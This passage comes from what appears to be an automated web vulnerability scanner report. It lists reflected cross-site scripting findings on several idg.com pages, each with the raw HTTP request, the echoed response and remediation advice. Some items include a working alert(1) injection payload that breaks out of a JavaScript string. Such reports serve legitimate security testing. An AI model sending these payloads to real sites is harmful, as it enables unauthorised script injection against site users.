This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs770bb"%3b7fc456656cc/about_IDG HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs770bb";7fc456656cc/about_IDG");
} catch(err) {}</script>
...[SNIP]...

2.128. http://idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/about_IDG

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e603"%3b0d69f7e74a7 was submitted in the REST URL parameter 4. This input was echoed as 8e603";0d69f7e74a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/about_IDG8e603"%3b0d69f7e74a7 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:50 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/about_IDG8e603";0d69f7e74a7");
} catch(err) {}</script>
...[SNIP]...

2.129. http://idg.com/www/HomeNew.nsf/docs/about_IDG [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/about_IDG

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6071f"-alert(1)-"5649c346001 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/about_IDG?6071f"-alert(1)-"5649c346001=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:45 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5031
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/about_IDG?6071f"-alert(1)-"5649c346001=1");
} catch(err) {}</script>
...[SNIP]...

2.130. http://idg.com/www/HomeNew.nsf/docs/company_milestones [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/company_milestones

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 681e8"%3b4555cf79d0f was submitted in the REST URL parameter 1. This input was echoed as 681e8";4555cf79d0f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www681e8"%3b4555cf79d0f/HomeNew.nsf/docs/company_milestones HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:49 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www681e8";4555cf79d0f/HomeNew.nsf/docs/company_milestones");
} catch(err) {}</script>
...[SNIP]...

2.131. http://idg.com/www/HomeNew.nsf/docs/company_milestones [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/company_milestones

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4851"%3b9ad27ea35 was submitted in the REST URL parameter 3. This input was echoed as f4851";9ad27ea35 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docsf4851"%3b9ad27ea35/company_milestones HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:52 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5025
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docsf4851";9ad27ea35/company_milestones");
} catch(err) {}</script>
...[SNIP]...

2.132. http://idg.com/www/HomeNew.nsf/docs/company_milestones [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/company_milestones

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60f25"%3b04c47483c89 was submitted in the REST URL parameter 4. This input was echoed as 60f25";04c47483c89 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/company_milestones60f25"%3b04c47483c89 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:52 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/company_milestones60f25";04c47483c89");
} catch(err) {}</script>
...[SNIP]...

2.133. http://idg.com/www/HomeNew.nsf/docs/company_milestones [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/company_milestones

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 905aa"-alert(1)-"d72675069e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/company_milestones?905aa"-alert(1)-"d72675069e7=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5040
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/company_milestones?905aa"-alert(1)-"d72675069e7=1");
} catch(err) {}</script>
...[SNIP]...

2.134. http://idg.com/www/HomeNew.nsf/docs/contact_us [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/contact_us

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1873a"%3b8cbab62b12d was submitted in the REST URL parameter 1. This input was echoed as 1873a";8cbab62b12d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www1873a"%3b8cbab62b12d/HomeNew.nsf/docs/contact_us HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:53 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www1873a";8cbab62b12d/HomeNew.nsf/docs/contact_us");
} catch(err) {}</script>
...[SNIP]...

2.135. http://idg.com/www/HomeNew.nsf/docs/contact_us [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/contact_us

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3070d"%3b8635bbbc483 was submitted in the REST URL parameter 3. This input was echoed as 3070d";8635bbbc483 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs3070d"%3b8635bbbc483/contact_us HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:54 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs3070d";8635bbbc483/contact_us");
} catch(err) {}</script>
...[SNIP]...

2.136. http://idg.com/www/HomeNew.nsf/docs/contact_us [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/contact_us

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48944"%3b28ffbbcf7d6 was submitted in the REST URL parameter 4. This input was echoed as 48944";28ffbbcf7d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/contact_us48944"%3b28ffbbcf7d6 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5019
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/contact_us48944";28ffbbcf7d6");
} catch(err) {}</script>
...[SNIP]...

2.137. http://idg.com/www/HomeNew.nsf/docs/contact_us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/contact_us

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31f7e"-alert(1)-"b3cc543f05e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/contact_us?31f7e"-alert(1)-"b3cc543f05e=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:53 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5032
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/contact_us?31f7e"-alert(1)-"b3cc543f05e=1");
} catch(err) {}</script>
...[SNIP]...

2.138. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/corporate_profile

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26bfa"%3b1baf8807546 was submitted in the REST URL parameter 1. This input was echoed as 26bfa";1baf8807546 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www26bfa"%3b1baf8807546/HomeNew.nsf/docs/corporate_profile HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:45 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www26bfa";1baf8807546/HomeNew.nsf/docs/corporate_profile");
} catch(err) {}</script>
...[SNIP]...

2.139. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/corporate_profile

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6119f"%3b71da451f5 was submitted in the REST URL parameter 3. This input was echoed as 6119f";71da451f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs6119f"%3b71da451f5/corporate_profile HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5024
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs6119f";71da451f5/corporate_profile");
} catch(err) {}</script>
...[SNIP]...

2.140. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/corporate_profile

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6379"%3b8834bed9364 was submitted in the REST URL parameter 4. This input was echoed as f6379";8834bed9364 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/corporate_profilef6379"%3b8834bed9364 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/corporate_profilef6379";8834bed9364");
} catch(err) {}</script>
...[SNIP]...

2.141. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/corporate_profile

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85712"-alert(1)-"9259a875ca6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/corporate_profile?85712"-alert(1)-"9259a875ca6=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5039
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/corporate_profile?85712"-alert(1)-"9259a875ca6=1");
} catch(err) {}</script>
...[SNIP]...

2.142. http://idg.com/www/HomeNew.nsf/docs/idc [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/idc

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36e57"%3b024fc10ff1c was submitted in the REST URL parameter 1. This input was echoed as 36e57";024fc10ff1c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www36e57"%3b024fc10ff1c/HomeNew.nsf/docs/idc HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
